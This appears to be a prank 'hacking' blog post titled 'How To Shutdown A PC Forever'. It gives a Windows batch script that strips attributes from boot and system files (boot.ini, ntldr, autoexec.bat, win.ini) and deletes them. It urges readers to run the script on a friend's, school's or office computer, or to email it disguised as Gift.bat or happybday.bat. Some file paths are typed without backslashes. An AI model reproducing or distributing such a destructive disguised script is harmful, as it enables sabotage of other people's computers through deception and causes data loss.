How To Shutdown A PC Forever

Ever wanted to shut down your friend’s PC forever? or do you want to turn of ours school or office computer forever just for fun?
If yes than here is what you can do.A small piece of code can turn off the computer forever.Have a look

1) Open notepad and type this code:

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini

 

2) Save it as name.bat , for example: hackspc.bat , the .bat is important to put or the program will not work. And on the computer you want to shutdown, open it. Or if you want to e-mail it to someone you can change the name something like Gift.bat , happybday.bat.

 REMEMBER – DO NOT CLICK THIS FILE. YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!